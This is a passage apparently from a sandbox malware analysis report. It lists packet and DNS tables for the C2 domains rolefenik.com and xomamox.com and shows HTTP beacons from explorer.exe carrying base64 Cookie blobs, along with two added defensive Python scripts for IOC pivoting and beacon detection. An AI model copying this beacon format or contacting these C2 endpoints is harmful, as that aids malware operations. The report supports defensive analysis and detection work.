                                                                                                                                                          Nov 13, 2024 11:03:11.207629919 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:11.207703114 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.207706928 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:11.207751989 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.207895994 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.207926989 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:11.287736893 CET58110443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.287817001 CET44358110172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:11.287887096 CET58110443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.288177967 CET58110443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:11.288203955 CET44358110172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:11.897500038 CET44358110172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:11.897932053 CET58110443192.168.2.8172.67.191.232
Nov 13, 2024 11:03:11.898272038 CET | 58110 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:11.898299932 CET | 443 | 58110 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:11.904033899 CET | 58110 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:11.904076099 CET | 443 | 58110 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:14.603709936 CET | 443 | 58110 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:14.603776932 CET | 443 | 58110 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:14.604296923 CET | 58110 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:14.607085943 CET | 58110 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:14.607130051 CET | 443 | 58110 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:14.688028097 CET | 58111 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:14.688096046 CET | 443 | 58111 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:14.688383102 CET | 58111 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:14.688417912 CET | 58111 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:14.688426018 CET | 443 | 58111 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:15.448308945 CET | 443 | 58111 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:15.448359013 CET | 58111 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:15.448913097 CET | 58111 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:15.448924065 CET | 443 | 58111 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:15.450834036 CET | 58111 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:15.450839043 CET | 443 | 58111 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:17.830323935 CET | 443 | 58111 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:17.830488920 CET | 443 | 58111 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:17.830543041 CET | 58111 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:17.830626011 CET | 58111 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:17.830626011 CET | 58111 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:17.884116888 CET | 58112 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:17.884145975 CET | 443 | 58112 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:17.888258934 CET | 58112 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:17.888258934 CET | 58112 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:17.888286114 CET | 443 | 58112 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:18.135369062 CET | 58111 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:18.135401964 CET | 443 | 58111 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:18.487180948 CET | 443 | 58112 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:18.492049932 CET | 58112 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:18.492049932 CET | 58112 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:18.492069960 CET | 443 | 58112 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:18.495538950 CET | 58112 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:18.495551109 CET | 443 | 58112 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:20.439498901 CET | 58113 | 8877 | 192.168.2.8 | 80.66.76.106
Nov 13, 2024 11:03:20.444794893 CET | 8877 | 58113 | 80.66.76.106 | 192.168.2.8
Nov 13, 2024 11:03:20.444941044 CET | 58113 | 8877 | 192.168.2.8 | 80.66.76.106
Nov 13, 2024 11:03:20.445261955 CET | 58113 | 8877 | 192.168.2.8 | 80.66.76.106
Nov 13, 2024 11:03:20.451217890 CET | 8877 | 58113 | 80.66.76.106 | 192.168.2.8
Nov 13, 2024 11:03:20.528692961 CET | 443 | 58112 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:20.528827906 CET | 443 | 58112 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:20.539064884 CET | 58112 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:20.544673920 CET | 58112 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:20.544707060 CET | 443 | 58112 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:20.780016899 CET | 58114 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:20.780066967 CET | 443 | 58114 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:20.784105062 CET | 58114 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:20.788014889 CET | 58114 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:20.788027048 CET | 443 | 58114 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:21.274148941 CET | 8877 | 58113 | 80.66.76.106 | 192.168.2.8
Nov 13, 2024 11:03:21.274211884 CET | 58113 | 8877 | 192.168.2.8 | 80.66.76.106
Nov 13, 2024 11:03:21.274636030 CET | 58113 | 8877 | 192.168.2.8 | 80.66.76.106
Nov 13, 2024 11:03:21.276021004 CET | 58113 | 8877 | 192.168.2.8 | 80.66.76.106
Nov 13, 2024 11:03:21.279638052 CET | 8877 | 58113 | 80.66.76.106 | 192.168.2.8
Nov 13, 2024 11:03:21.281243086 CET | 8877 | 58113 | 80.66.76.106 | 192.168.2.8
Nov 13, 2024 11:03:21.409349918 CET | 443 | 58114 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:21.409415007 CET | 58114 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:21.409888029 CET | 58114 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:21.409895897 CET | 443 | 58114 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:21.411159039 CET | 58114 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:21.411164045 CET | 443 | 58114 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:23.232287884 CET | 443 | 58114 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:23.232340097 CET | 58114 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:23.232351065 CET | 443 | 58114 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:23.232386112 CET | 58114 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:23.232439041 CET | 443 | 58114 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:23.232532978 CET | 58114 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:25.399539948 CET | 58114 | 443 | 192.168.2.8 | 172.67.191.232
Nov 13, 2024 11:03:25.399561882 CET | 443 | 58114 | 172.67.191.232 | 192.168.2.8
Nov 13, 2024 11:03:26.346013069 CET | 8877 | 58113 | 80.66.76.106 | 192.168.2.8
Nov 13, 2024 11:03:26.346091032 CET | 58113 | 8877 | 192.168.2.8 | 80.66.76.106
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 13, 2024 10:59:22.337012053 CET | 58431 | 53 | 192.168.2.8 | 1.1.1.1
Nov 13, 2024 10:59:23.354455948 CET | 58431 | 53 | 192.168.2.8 | 1.1.1.1
Nov 13, 2024 10:59:23.428050995 CET | 53 | 58431 | 1.1.1.1 | 192.168.2.8
Nov 13, 2024 10:59:23.428069115 CET | 53 | 58431 | 1.1.1.1 | 192.168.2.8
Nov 13, 2024 10:59:35.451606989 CET | 53 | 55922 | 1.1.1.1 | 192.168.2.8
Nov 13, 2024 10:59:49.109538078 CET | 53 | 52086 | 1.1.1.1 | 192.168.2.8
Nov 13, 2024 11:02:02.907955885 CET | 49645 | 53 | 192.168.2.8 | 1.1.1.1
Nov 13, 2024 11:02:03.095415115 CET | 53 | 49645 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 13, 2024 10:59:22.337012053 CET | 192.168.2.8 | 1.1.1.1 | 0x3a16 | Standard query (0) | xomamox.com | A (IP address) | IN (0x0001) | false
Nov 13, 2024 10:59:23.354455948 CET | 192.168.2.8 | 1.1.1.1 | 0x3a16 | Standard query (0) | xomamox.com | A (IP address) | IN (0x0001) | false
Nov 13, 2024 11:02:02.907955885 CET | 192.168.2.8 | 1.1.1.1 | 0x2516 | Standard query (0) | rolefenik.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 13, 2024 10:59:23.428050995 CET | 1.1.1.1 | 192.168.2.8 | 0x3a16 | No error (0) | xomamox.com | | 80.66.76.106 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 10:59:23.428069115 CET | 1.1.1.1 | 192.168.2.8 | 0x3a16 | No error (0) | xomamox.com | | 80.66.76.106 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 11:02:03.095415115 CET | 1.1.1.1 | 192.168.2.8 | 0x2516 | No error (0) | rolefenik.com | | 172.67.191.232 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 11:02:03.095415115 CET | 1.1.1.1 | 192.168.2.8 | 0x2516 | No error (0) | rolefenik.com | | 104.21.92.105 | A (IP address) | IN (0x0001) | false
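
The DNS answer table and the TCP packet table above are what an analyst joins to turn "connections to 172.67.191.232:443 and 80.66.76.106:8877" into "connections to rolefenik.com and xomamox.com". The script below does that pivot. It is an added example, not part of the Joe Sandbox report or its tooling; the DNS answers and the packet rows are a constructed subset copied from this report's own tables, and treating 192.168.2.8 as the analysis VM is an assumption taken from the report's rows.

```python
"""Pivot from a sandbox DNS/TCP summary to "which name did each C2 connection
come from". Added example; DNS_ANSWERS and PACKETS are a constructed subset
of this report's DNS answer and TCP packet tables, not a live capture."""
from collections import defaultdict
from datetime import datetime

# Assumption taken from the report: every row involves the analysis VM.
SANDBOX_HOST = "192.168.2.8"

# DNS answers from the report: (queried name, returned A record)
DNS_ANSWERS = [
    ("xomamox.com", "80.66.76.106"),
    ("rolefenik.com", "172.67.191.232"),
    ("rolefenik.com", "104.21.92.105"),
]

# TCP packets from the report: (timestamp, src port, dst port, src IP, dst IP).
# Constructed subset: the opening packet of each client connection plus a few replies.
PACKETS = [
    ("Nov 13, 2024 11:03:11.898272038 CET", 58110, 443, "192.168.2.8", "172.67.191.232"),
    ("Nov 13, 2024 11:03:11.898299932 CET", 443, 58110, "172.67.191.232", "192.168.2.8"),
    ("Nov 13, 2024 11:03:14.688028097 CET", 58111, 443, "192.168.2.8", "172.67.191.232"),
    ("Nov 13, 2024 11:03:17.884116888 CET", 58112, 443, "192.168.2.8", "172.67.191.232"),
    ("Nov 13, 2024 11:03:20.439498901 CET", 58113, 8877, "192.168.2.8", "80.66.76.106"),
    ("Nov 13, 2024 11:03:20.444794893 CET", 8877, 58113, "80.66.76.106", "192.168.2.8"),
    ("Nov 13, 2024 11:03:20.780016899 CET", 58114, 443, "192.168.2.8", "172.67.191.232"),
    ("Nov 13, 2024 11:03:26.346091032 CET", 58113, 8877, "192.168.2.8", "80.66.76.106"),
]


def parse_ts(ts: str) -> datetime:
    """Joe Sandbox prints nanosecond timestamps; datetime stops at microseconds."""
    stamp, _tz = ts.rsplit(" ", 1)          # drop the trailing "CET"
    base, frac = stamp.split(".")
    return datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def normalize(pkt):
    """Orient a packet so the sandbox host is always the client side.

    Returns (client_port, server_ip, server_port, timestamp)."""
    ts, sport, dport, sip, dip = pkt
    if sip == SANDBOX_HOST:
        return sport, dip, dport, parse_ts(ts)
    if dip == SANDBOX_HOST:
        return dport, sip, sport, parse_ts(ts)
    raise ValueError(f"packet does not involve {SANDBOX_HOST}: {pkt}")


def names_by_address(answers):
    """Reverse the DNS answers: address -> set of names that resolved to it."""
    names = defaultdict(set)
    for name, addr in answers:
        names[addr].add(name)
    return names


def summarize(packets, answers):
    """Group packets by (server_ip, server_port) and attach the DNS names that
    resolved to that server; each distinct client port is one TCP connection."""
    names = names_by_address(answers)
    conns = {}
    for pkt in packets:
        cport, sip, sport, ts = normalize(pkt)
        entry = conns.setdefault((sip, sport), {
            "names": sorted(names.get(sip, {"<no DNS answer seen>"})),
            "client_ports": set(), "first": ts, "last": ts,
        })
        entry["client_ports"].add(cport)
        entry["first"] = min(entry["first"], ts)
        entry["last"] = max(entry["last"], ts)
    return conns


def resolved_but_unused(packets, answers):
    """Addresses the resolver returned that the sample never connected to.
    They still belong on the block list: here rolefenik.com had two A records
    and only one of them was contacted."""
    contacted = {normalize(p)[1] for p in packets}
    return sorted(addr for _name, addr in answers if addr not in contacted)


if __name__ == "__main__":
    for (ip, port), e in summarize(PACKETS, DNS_ANSWERS).items():
        print(f"{ip}:{port:<5} {','.join(e['names']):<14} "
              f"connections={len(e['client_ports'])} "
              f"{e['first'].time()} .. {e['last'].time()}")
    print("resolved but never contacted:", resolved_but_unused(PACKETS, DNS_ANSWERS))
```

Run against the full packet table the count per server becomes the number of TLS sessions the sample opened to each C2; the second Cloudflare address for rolefenik.com shows up only in the "resolved but never contacted" list, which is why IOC lists should be built from the DNS answers and not just from the connection log.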
• rolefenik.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 58086 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:02:03 UTC | 411 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1lHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 92
Cache-Control: no-cache
2024-11-13 10:02:03 UTC | 92 | OUT | Data Raw: 55 61 54 62 71 55 73 54 30 33 6f 7a 44 37 30 2b 5a 6f 59 4b 49 69 30 32 54 37 78 53 6d 6e 34 4b 57 2f 33 75 55 38 7a 4b 49 34 31 4b 38 46 61 53 5a 57 59 54 6f 4d 78 32 61 6e 4f 31 67 47 55 50 43 71 39 74 55 44 39 47 57 33 78 4b 63 55 39 42 77 49 74 72 76 78 68 70 38 78 4d 3d
Data Ascii: UaTbqUsT03ozD70+ZoYKIi02T7xSmn4KW/3uU8zKI41K8FaSZWYToMx2anO1gGUPCq9tUD9GW3xKcU9BwItrvxhp8xM=
2024-11-13 10:02:05 UTC | 783 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yxjpZAvChrW4IcYpjelq4GYv2r6Tg1NTx%2BhC3YIC%2Fm%2BXHBTbixVaRiP9xHKtpsQhLCw0SjGhax%2Fb9woyqnQldgvMVGPkQg6IgS6SHRl15tSPJLaz1gyVBAvCUg0XZJJc"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1dec8dd8072c9a-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2128&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1163&delivery_rate=1343228&cwnd=250&unsent_bytes=0&cid=9aabcecc38127dfd&ts=2021&x=0"
2024-11-13 10:02:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 58087 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:02:07 UTC | 410 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1kHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:02:09 UTC | 789 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8%2FjJF%2BPPf6%2FModTtMzNFfHJqnA3v8Irep3oTYJcTTww77S%2FWiTrJUstclTkjvUkjepqXuXCgIjKHJ8FIQ4QRUWGEUVBnDxs7gn%2FV9Tjb%2BFraxf1wG%2FzHkJM8VMGXYGD"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1deca3efef6c64-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2155&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1344475&cwnd=251&unsent_bytes=0&cid=24e7d92256927b6f&ts=2313&x=0"
2024-11-13 10:02:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
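
The beacons explorer.exe sends to rolefenik.com (sessions 0, 1 and 2) are worth pulling apart: the Cookie header is not a cookie at all but a single base64 token, the body is declared as a form yet carries no key=value pair, and the only thing that changes between the three requests is one character of the Cookie. The script below, an added example that is neither Joe Sandbox code nor anything extracted from the sample, parses the request reconstructed from session 0, applies those checks and locates the varying byte. REQUEST_0 and the three cookie values are copied from the report's session tables; the heuristics themselves are this example's own, not signatures the report states, and the page does not say what the varying byte encodes.

```python
"""Indicator extraction for the HTTP beacons in this report. Added example;
REQUEST_0 and COOKIES are reconstructed from sessions 0, 1 and 2 of the report.
The detection heuristics are the example's own, not rules from the report."""
import base64
import binascii

# Cookie values of sessions 0, 1 and 2. They share a 164-character tail and
# differ only in the 12th character (index 11).
_COOKIE_TAIL = ("HfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGj"
                "TlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id"
                "3u40tswtcz6pIAoc")
COOKIES = {0: "FKbPpAITwn1l" + _COOKIE_TAIL,
           1: "FKbPpAITwn1k" + _COOKIE_TAIL,
           2: "FKbPpAITwn1n" + _COOKIE_TAIL}

# The User-Agent recorded in every beacon of this report.
UA_IN_REPORT = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)"

# Session 0 request, reconstructed verbatim from the report's session table.
REQUEST_0 = (
    "POST /test/ HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Cookie: {COOKIES[0]}\r\n"
    f"User-Agent: {UA_IN_REPORT}\r\n"
    "Host: rolefenik.com\r\n"
    "Content-Length: 92\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "UaTbqUsT03ozD70+ZoYKIi02T7xSmn4KW/3uU8zKI41K8FaSZWYToMx2anO1gGUPCq9tUD9GW3xKcU9BwItrvxhp8xM="
)


def parse_request(raw: str) -> dict:
    """Minimal HTTP/1.1 request parser: request line, headers (lower-cased), body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def b64_decode_lenient(s: str):
    """Decode base64, tolerating stripped padding; None if it is not base64 at all."""
    s = s.strip()
    try:
        return base64.b64decode(s + "=" * (-len(s) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None


def cookie_is_bare_blob(cookie: str, min_len: int = 32) -> bool:
    """RFC 6265 cookies are name=value pairs. One long token with no '=' before
    the first ';' is not a cookie; it is data carried in a header that proxies
    and WAFs rarely inspect."""
    first = cookie.split(";", 1)[0].strip()
    return len(first) >= min_len and "=" not in first


def diff_positions(a, b):
    """Indices at which two sequences of equal length differ."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


def varying_offsets(values):
    """Decoded byte offsets that change between successive beacons. A single
    fixed offset inside an otherwise identical blob is where to look first
    when reversing the structure; this report does not say what it holds."""
    decoded = [b64_decode_lenient(v) for v in values]
    offsets = set()
    for a, b in zip(decoded, decoded[1:]):
        offsets.update(diff_positions(a, b))
    return sorted(offsets)


def beacon_indicators(req: dict) -> list:
    """Return human-readable findings for one parsed request (empty if clean)."""
    h = req["headers"]
    findings = []
    cookie = h.get("cookie", "")
    blob = b64_decode_lenient(cookie) if cookie_is_bare_blob(cookie) else None
    if blob is not None:
        findings.append(f"Cookie is a bare base64 blob ({len(blob)} bytes decoded)")
    body = req["body"]
    body_bytes = b64_decode_lenient(body) if body else None
    if (h.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and body_bytes and "=" not in body.rstrip("=")):
        findings.append(f"form-encoded body has no key=value pairs; "
                        f"base64 of {len(body_bytes)} bytes")
    if h.get("user-agent") == UA_IN_REPORT:
        findings.append("User-Agent matches the string seen in this report's beacons")
    if req["method"] == "POST" and h.get("content-length") == "0":
        findings.append("POST with Content-Length: 0 (empty check-in)")
    return findings


if __name__ == "__main__":
    for f in beacon_indicators(parse_request(REQUEST_0)):
        print("-", f)
    print("cookie chars that differ across sessions:",
          diff_positions(COOKIES[0], COOKIES[1]))
    print("decoded byte offsets that vary:", varying_offsets(list(COOKIES.values())))
```

The bare-blob Cookie check is the one that survives infrastructure changes: the domain, the path and the User-Agent are trivially rotated, while a C2 that tunnels an encrypted structure through the Cookie header has to keep sending something that is not name=value. Sessions 1 and 2 carry Content-Length: 0, so only the Cookie-based checks fire on them.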


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 58088 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:02:10 UTC | 410 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1nHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:02:12 UTC | 793 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oKtGQCdLxR%2FNq6eImsZSkcjTrJua%2F%2Bomg8VC2w%2F4xwRZIJoD2uon2tHwY8rgF6t%2FS7jMCkS3Q3OB1dHAjjqUtF%2F%2FpFtK%2BI4ZjGA92IpW11gXEH%2FCnFPUsRXqPeuKcy8x"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1decb6cb73e5ad-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1958&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1048&delivery_rate=2578806&cwnd=250&unsent_bytes=0&cid=16a7955d034298eb&ts=1963&x=0"
2024-11-13 10:02:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 58089 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:02:13 UTC | 410 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1mHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:02:15 UTC | 785 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PUNN2pwwS%2Ft9eDthAEIEk5%2FpTT3KUC2%2B%2BtE99n4ke9BI63tyBxeWNrsVwBIwWttMv6c6Dh9zYhqiGUkMJdMzdQeQM01rG%2F5r4hmGdjloU1e3b3MkJLDkOYqnH12mDrcb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1decc8ccf0464a-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1059&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=2664213&cwnd=252&unsent_bytes=0&cid=4eeb06d830acd2c5&ts=2385&x=0"
2024-11-13 10:02:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 58090 | 172.67.191.232 | 443 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-13 10:02:16 UTC | 410 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: FKbPpAITwn1hHfMldNkDJjE3DO8PxHceC6bBYoqPcc1lo3i2bGwf2MBxbhTn3U4vIfN2Emo1DDdORRF+sugGjTlD1C0YZDvY4njVsm1JElRdpnKcan2Os6moOPARSB3ea+mcIh8vUE1ndUQdG7GtYu9kpzMlO5Id3u40tswtcz6pIAoc
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: rolefenik.com
Content-Length: 0
Cache-Control: no-cache
2024-11-13 10:02:19 UTC | 777 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 10:02:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
vary: accept-encoding
